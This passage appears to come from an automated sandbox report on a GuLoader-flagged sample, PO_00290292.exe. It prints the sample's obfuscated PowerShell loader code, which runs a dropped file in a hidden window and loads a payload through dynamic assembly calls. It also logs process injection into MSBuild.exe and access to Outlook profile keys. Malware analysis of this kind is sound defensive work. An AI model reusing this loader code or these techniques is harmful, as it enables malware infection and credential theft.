I0DiBFj1AgCFl0Ud1Su1SeEHo3PhDFo0CaBCo1 TCgr1re8Ma0 D7An0UdDBo0AtBJu1VeDPo4Jo0Mi2 P6 P0 SFFo0Ju0re0CoA S0Bl2 S0 LBUn3CaCNd0UnBLo0Af8 B' M;In`$DeECosDrtDri Sm se UrTriOunRegSke MrPr4Ti=deP IyPexSpiSpdCee FsSu4Zo Zo'At1PaDva1SoA E1ReCud0 B7Ha0 E0Mi0 A9Ti'No;Sw`$SeEHasBltSeiPamKoeOvrPoiGrnGegObe ArWi5Sk=DiPabyToxGaiSedOre GsVo4St D' F2Da9Ko0 MBtr1LiAAd2 U3Fe0Sl1sk0UnA P1asBTr0Do2Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exeJump to behavior
                Source: C:\Users\user\Desktop\PO_00290292.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\PO_00290292.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\skrides.iniJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                Source: PO_00290292.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                Yara detected GuLoader
                Source: Yara matchFile source: 00000004.00000002.1607315520.00000000087AA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1604051248.0000000005CF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1607101353.0000000008450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1728501631.000000000285B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\sarawakese.dri, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\nse6573.tmp, type: DROPPED
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((fkp $Manicurist $Sawworker854), (GDT @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$Indbyggedesgamospore = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Ob
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Estimeringer8)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Estimeringer9, $false).DefineType($Sawworke
                Suspicious powershell command line found
                Source: C:\Users\user\Desktop\PO_00290292.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $derremc = Get-Content 'C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\Lection.Fle' ; powershell.exe "$derremc"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Spejlvende Journaliseringssystems Conservatorial #><#Basilikers Toothcomb Letfordrvelig #>$Portugals = """Ko;SmFOmu RnFac FtTwiStoFonDe OtPAlyInxHui PdSkeInsEr4 F In{ S tv Po fi TupOvaBerGaafomPa(sm[BeS Tt HrPeiAunOsgEv]Ov`$SpSuioBelAnfPsa UlCedTo)Fo;bu Go`$OvNSkoOprDetNohObuRhm Cb OeLirAal BaTonbodDe Fu=Sk Ru`$ VSSpoAnlVafHeaPulHldRe.CiLHaePrnAsgFatInh M;Ne L Vi Af Ta`$PoD RrAniElf OtSvsPasUnyexs OtSteRimBumreeRetAnsSm Tr=Ch NoNArevvwAp-LaO NbSojOpe DcStt P Tb Ry FtSneVa[Pr]Wh Ud(Le`$miNBioLir VtPahMuuUdm TbSaeperGalAfaInnDedLi Op/ci St2Bo)An; K Ps`$PrRfioCadUntUme PgAnnGyeovtAn1St6Ug8Ab=Pi' CS AU D'In+ P'EdBUnSSpTBoRUnIThNDoG l'Aa;Af Da Co Im TF FoWarDe( D`$StNEnoChnCyetexNupudeOvccrt FaTanPatPa= U0Pl;No Ho`$NoNByoHjnUtelix Tp OeSoc St FaUnnSvtSy Op-ShlTetRe J`$KoNakoVurActQuh SuBumUdbYeeovrOrlSuaMinCrdcr;Li U`$SeNMaoPinTrePaxAlpspeLocHetSmaUnnBetBa+ro= G2Tr) P{Se Un He He Un Au Ko Ta ar`$PoDDer BiDefTet BsTrsBoyThs BtNaeunmKnmWaeAmtDosCa[ S`$ScNUgoBlnMaeApxEkpCaeRec At HaInnentDr/Ho2 U] K Ka= S Da[stcSmoPan BvSkeLer OtOb] N:Zi:UnTreoAaB SyBrt GeHa( d`$ JSMaoWilkofHoaOvlHodOm.No`$AtRPaoPodGitage NgTnnMaemat F1re6Ar8Be.CoI FnPhvSpoNektieJo(Fl`$PhN Do OnBoe RxCop ReSicTatInaSanBatJo,Ln Sp2Fu)Ep,Tr K1Cl6Un)Br;Po in F`$gaDPerChiMefKotRasOvsTey SsRetBoeFimSumIne wtUdsFi[Ar`$TrNMoo Sn Ue DxCypByeRocCotAnaNunomtTe/Ph2No]st Ar=So HaxGaoKnrSoaQummiiBa Sk`$MoDShrSei Sf UtsosPrsSpyLesdotBieDimDomRreUntSps P[ U`$UnNAroRen AeBexHopGee Sc PtBaaInnIntEa/Be2ov]Fi Po1Pl1 M0Gl;ra N un Po Fl}Fo Ou[PsSCotUnrPhiSynSogUn]De[PeSSuy PsLitSkepymIn.KaTSoe LxAntEu.SiEVan Dc UodedPriFnn PgSp]Ph: e:AyAPoSOoC MIFuIJa.PaGGee LtBeSCatStrEri wnUng B(da`$ElDCarIsiAtfPat BsChs SyMnsPttSeeUdmOvmaueDrtPas E)Ra;Un}St`$VeEBismetBjiGamSteHarDiiHanTogSmetorCh0 D=KoPGrySvxPuiOvdSme Ks l4Fi Sk'Au3StDHo1Af7Bo1TrDal1SyAsp0SiBri0 H3Cr4Af0Ma0PlABa0Af2 B0Gr2St'Ga;Ov`$deENesNetTiiFimBreKirSaiLenWagfjeBorLe1Py=AuP lyLexUniFedCleGesat4Op Fa'Ra2Pr3ta0 e7 D0KlDUn1NoCCo0Li1 R1 TDWe0Un1 D0Yv8Su1 TA O4 R0 A3ny9Sl0Fo7Cr0In0Ta5DaD K5ThCLo4 W0Kd3 KB F0Em0ig1SkD D0ReF R0ir8Bu0FoBOp2Ir0De0 SFUg1arAMa0St7Va1Be8 A0UnBKa2Ge3Ho0JuB A1 RA A0Vi6 G0 G1An0DeAHa1KaDPr'Wh; V`$ CEKos StSoi SmEneUnr ui TnNog SeOvrMe2As=ApPTaySaxDriUndreeTesSp4In ap'In2 d9Bl0CrBSa1 AAUn3MaESk1VaCun0Ch1Te0DdDin2SlFBu0SaAAl0TeA F1DyC D0TaBSt1 KDEl1TrDbr'Ra;Ca`$FaEHasSetPaiNim ReElrHai FnStgUre Irgr3 I=LaPGayWexfliBddSoeBosPa4No ek'Re3StDIn1mi7Un1RuDCp1 NA N0maBRo0Fa3 V4Ma0Br3UnC F1MiBZo0 H0So1FeAKa0Ma7Bl0Un3 C0CaB D4Mo0Pr2Da7Sc0Ho0Hu1ReA I0DiBFj1AgCFl0Ud1Su1SeEHo3PhDFo0CaBCo1 TCgr1re8Ma0 D7An0UdDBo0AtBJu1VeDPo4Jo0Mi2 P6 P0 SFFo0Ju0re0CoA S0Bl2 S0 LBUn3CaCNd0UnBLo0Af8 B' M;In`$DeECosDrtDri Sm se UrTriOunRegSke MrPr4Ti=deP IyPexSpiSpdCee FsSu4Zo Zo'At1PaDva1SoA E1ReCud0 B7Ha0 E0Mi0 A9Ti'No;Sw`$SeEHasBltSeiPamKoeOvrPoiGrnGegObe ArWi5Sk=DiPabyToxGaiSedOre GsVo4St D' F2Da9Ko0 MBtr1LiAAd2 U3Fe0Sl1sk0UnA P1asBTr0Do2
                Source: C:\Users\user\Desktop\PO_00290292.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $derremc = Get-Content 'C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\Lection.Fle' ; powershell.exe "$derremc"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Spejlvende Journaliseringssystems Conservatorial #><#Basilikers Toothcomb Letfordrvelig #>$Portugals = """Ko;SmFOmu RnFac FtTwiStoFonDe OtPAlyInxHui PdSkeInsEr4 F In{ S tv Po fi TupOvaBerGaafomPa(sm[BeS Tt HrPeiAunOsgEv]Ov`$SpSuioBelAnfPsa UlCedTo)Fo;bu Go`$OvNSkoOprDetNohObuRhm Cb OeLirAal BaTonbodDe Fu=Sk Ru`$ VSSpoAnlVafHeaPulHldRe.CiLHaePrnAsgFatInh M;Ne L Vi Af Ta`$PoD RrAniElf OtSvsPasUnyexs OtSteRimBumreeRetAnsSm Tr=Ch NoNArevvwAp-LaO NbSojOpe DcStt P Tb Ry FtSneVa[Pr]Wh Ud(Le`$miNBioLir VtPahMuuUdm TbSaeperGalAfaInnDedLi Op/ci St2Bo)An; K Ps`$PrRfioCadUntUme PgAnnGyeovtAn1St6Ug8Ab=Pi' CS AU D'In+ P'EdBUnSSpTBoRUnIThNDoG l'Aa;Af Da Co Im TF FoWarDe( D`$StNEnoChnCyetexNupudeOvccrt FaTanPatPa= U0Pl;No Ho`$NoNByoHjnUtelix Tp OeSoc St FaUnnSvtSy Op-ShlTetRe J`$KoNakoVurActQuh SuBumUdbYeeovrOrlSuaMinCrdcr;Li U`$SeNMaoPinTrePaxAlpspeLocHetSmaUnnBetBa+ro= G2Tr) P{Se Un He He Un Au Ko Ta ar`$PoDDer BiDefTet BsTrsBoyThs BtNaeunmKnmWaeAmtDosCa[ S`$ScNUgoBlnMaeApxEkpCaeRec At HaInnentDr/Ho2 U] K Ka= S Da[stcSmoPan BvSkeLer OtOb] N:Zi:UnTreoAaB SyBrt GeHa( d`$ JSMaoWilkofHoaOvlHodOm.No`$AtRPaoPodGitage NgTnnMaemat F1re6Ar8Be.CoI FnPhvSpoNektieJo(Fl`$PhN Do OnBoe RxCop ReSicTatInaSanBatJo,Ln Sp2Fu)Ep,Tr K1Cl6Un)Br;Po in F`$gaDPerChiMefKotRasOvsTey SsRetBoeFimSumIne wtUdsFi[Ar`$TrNMoo Sn Ue DxCypByeRocCotAnaNunomtTe/Ph2No]st Ar=So HaxGaoKnrSoaQummiiBa Sk`$MoDShrSei Sf UtsosPrsSpyLesdotBieDimDomRreUntSps P[ U`$UnNAroRen AeBexHopGee Sc PtBaaInnIntEa/Be2ov]Fi Po1Pl1 M0Gl;ra N un Po Fl}Fo Ou[PsSCotUnrPhiSynSogUn]De[PeSSuy PsLitSkepymIn.KaTSoe LxAntEu.SiEVan Dc UodedPriFnn PgSp]Ph: e:AyAPoSOoC MIFuIJa.PaGGee LtBeSCatStrEri wnUng B(da`$ElDCarIsiAtfPat BsChs SyMnsPttSeeUdmOvmaueDrtPas E)Ra;Un}St`$VeEBismetBjiGamSteHarDiiHanTogSmetorCh0 D=KoPGrySvxPuiOvdSme Ks l4Fi Sk'Au3StDHo1Af7Bo1TrDal1SyAsp0SiBri0 H3Cr4Af0Ma0PlABa0Af2 B0Gr2St'Ga;Ov`$deENesNetTiiFimBreKirSaiLenWagfjeBorLe1Py=AuP lyLexUniFedCleGesat4Op Fa'Ra2Pr3ta0 e7 D0KlDUn1NoCCo0Li1 R1 TDWe0Un1 D0Yv8Su1 TA O4 R0 A3ny9Sl0Fo7Cr0In0Ta5DaD K5ThCLo4 W0Kd3 KB F0Em0ig1SkD D0ReF R0ir8Bu0FoBOp2Ir0De0 SFUg1arAMa0St7Va1Be8 A0UnBKa2Ge3Ho0JuB A1 RA A0Vi6 G0 G1An0DeAHa1KaDPr'Wh; V`$ CEKos StSoi SmEneUnr ui TnNog SeOvrMe2As=ApPTaySaxDriUndreeTesSp4In ap'In2 d9Bl0CrBSa1 AAUn3MaESk1VaCun0Ch1Te0DdDin2SlFBu0SaAAl0TeA F1DyC D0TaBSt1 KDEl1TrDbr'Ra;Ca`$FaEHasSetPaiNim ReElrHai FnStgUre Irgr3 I=LaPGayWexfliBddSoeBosPa4No ek'Re3StDIn1mi7Un1RuDCp1 NA N0maBRo0Fa3 V4Ma0Br3UnC F1MiBZo0 H0So1FeAKa0Ma7Bl0Un3 C0CaB D4Mo0Pr2Da7Sc0Ho0Hu1ReA I0DiBFj1AgCFl0Ud1Su1SeEHo3PhDFo0CaBCo1 TCgr1re8Ma0 D7An0UdDBo0AtBJu1VeDPo4Jo0Mi2 P6 P0 SFFo0Ju0re0CoA S0Bl2 S0 LBUn3CaCNd0UnBLo0Af8 B' M;In`$DeECosDrtDri Sm se UrTriOunRegSke MrPr4Ti=deP IyPexSpiSpdCee FsSu4Zo Zo'At1PaDva1SoA E1ReCud0 B7Ha0 E0Mi0 A9Ti'No;Sw`$SeEHasBltSeiPamKoeOvrPoiGrnGegObe ArWi5Sk=DiPabyToxGaiSedOre GsVo4St D' F2Da9Ko0 MBtr1LiAAd2 U3Fe0Sl1sk0UnA P1asBTr0Do2Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04AE369B push ebx; iretd 4_2_04AE36DA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04AE60B0 push esp; iretd 4_2_04AE6189
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_075C75FF push esp; iretd 4_2_075C760B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_075C6CDC push ecx; iretd 4_2_075C6CDE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0869F074 pushad ; ret 4_2_0869F07B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0869F24B pushfd ; ret 4_2_0869F266
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_086A34E8 push edx; retf 4_2_086A3526
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_086A0D39 push eax; retf 4_2_086A0D3B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0869FBF6 push cs; ret 4_2_0869FC08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00AB0CB5 push edi; ret 5_2_00AB0CC2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00AB0C4B push edi; retf 5_2_00AB0C3A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01130138 push E47BA34Fh; ret 5_2_0113013D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01130489 pushad ; ret 5_2_01130491
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_23235D00 push eax; iretd 5_2_23235DFC
                Source: C:\Users\user\Desktop\PO_00290292.exeFile created: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\nsExec.dllJump to dropped file
                Source: C:\Users\user\Desktop\PO_00290292.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
